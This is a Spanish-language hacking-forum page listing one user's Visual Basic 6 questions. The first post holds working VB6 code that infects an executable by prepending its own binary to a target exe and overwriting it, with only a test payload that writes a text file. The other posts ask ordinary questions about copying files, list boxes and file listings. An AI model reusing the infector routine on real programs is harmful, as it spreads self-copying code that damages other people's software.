elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / Infección exe con Visual Basic 6 (SOLUCIONADO) en: 19 Junio 2010, 02:14 am
Wenasss noches gente.


Tengo una duda/problemilla con mi aplicación. Os comento.


Estoy desarrollando un proyecto... blablabla (tipico xDD). Total, que realizo la infección de un exe abriendolo, cogiendo su codigo (victima), abriendo mi prog, cogiendo mi codigo (atacante?) y reescribiendo la victima con mi codigo, y despues con el suyo.

El tema está en que para hacer pruebas, lo que la victima hace es crear un txt llamado "hola", y mi prog crea otro txt llamado "bu.txt" (si, nombres originales... xDD). La "infección" va bien, el exe pesa lo suyo (victima+atacante), pero solo crea el fichero "bu.txt" (siempre y cuando primero inyecte mi codigo en primer lugar). La pregunta es: ¿no debería crear los 2 txt´s?. Ya se que es muy básico, pero necesito saber si una vez ejecutado mi codigo, el otro exe (la victima), sigue con lo suyo...


PD: La función la saque de este foro (http://foro.elhacker.net/programacion_visual_basic/source_infeccion_de_ejecutables_en_vb6-t160863.0.html). Como supongo que necesitais el codigo, lo adjunto.


Salu2 y gracias anticipadas!!!!!

Codigo "atacante"

Código
  1. Private Sub Form_Load()
  2. Open App.Path & "\bu.txt" For Output As #2
  3. Print #2, "aaaa"
  4. Close #2
  5. infectar ("prog1.exe")
  6. Unload Me
  7. End
  8. End Sub
  9.  
  10. Function infectar(ByVal Victim As String)
  11.    On Error Resume Next
  12.    Dim VictimCode As String
  13.    Dim NewCode As String
  14.    Dim MyCode As String
  15.  
  16. 'Mi codigo
  17.    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
  18.        MyCode = Input(LOF(1), 1)
  19.    Close #1
  20.  
  21. 'Victima
  22.    Open Victim For Binary As #1
  23.        VictimCode = Input(LOF(1), 1)
  24.    Close #1
  25.  
  26.    NewCode = MyCode & VictimCode
  27.  
  28. 'Final
  29.    Open Victim For Binary As #1
  30.        Put #1, , NewCode
  31.    Close #1
  32. End Function
  33.  


Codigo "victima"

Código
  1. Private Sub Form_Load()
  2. Open App.Path + "\hola.txt" For Output As #1
  3. Print #1, "hola"
  4. Close #1
  5. Unload Me
  6. End
  7. End Sub
  8.  
2  Programación / Programación Visual Basic / Copiar archivos con visual basic 6 en: 29 Abril 2009, 12:26 pm
Buenos días chaval@s, hoy me toca hacer la pregunta tonta a mi...

En fin, llevo 6 horas programando y estoy empanao... pero totalmente.


Mi pregunta es la siguiente.


Como pueda copiar, por ejemplo, todos los *.txt de un directorio (este directorio lo cojo de un ini) a otro (este destino es estático).

He probado con filecopy, pero nada (filecopy archivos, "c:\temporal") y nada. También he probado a lanzar un shell con un copy, pero tampoco nada.


Ya os digo, me ha tocado la pregunta tonta a mi hoy, asi que si no es mucha molestia... xDD.


Salu2!!!
3  Programación / Programación Visual Basic / Elemento "parpadeante" en un listbox. en: 6 Marzo 2009, 11:07 am
Wenas a tod@s !

Necesito que alguien me heche una mano.


Tengo un listbox con varios elementos y lo que quiero hacer es que el ultimo que se ha seleccionado parpadee (despues de pulsar un boton). Me ejjjplico.


Si tengo 5 elementos, por ejemplo, y selecciono el número 3 y le doy al boton, lo que quiero es que el elemento 3 me parpade, de forma que se sepa cual ha sido el ultimo seleccionado, ¿esto es posible?.


Salu2!!!


4  Programación / Programación Visual Basic / Dudas con el objeto File en: 4 Diciembre 2008, 23:48 pm
Buenas noches a tod@s.


Estoy haciendo "trastadas" en Visual Basic 6.0 y no he tenido narices a hacer una cosa que me llevo planteando un tiempo.


Utilizo el objeto "File" para obtener los archivos de un directorio. Lo que quiero es listar el contenido de este objeto "File" (los archivos del directorio).


El codigo es el siguiente:

File1.FileName = ruta del directorio


Private Sub Command1_Click()
Dim items As Integer
Dim nombre As String

items = File1.ListCount - 1

For i = items To 0 Step -1
nombre = File1.Selected(i)
MsgBox (nombre)
Next

End Sub


El problema viene cuando intento mostrar con el "MsgBox(nombre)" el elemento por el que voy. Pero me sale un "Falso".


Quería saber si alguno sabeis (valga la redundancia) como recorrer los elementos de un objeto File y mostrarlos por un MsgBox.



Gracias anticipadas.




Salu2!!!!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines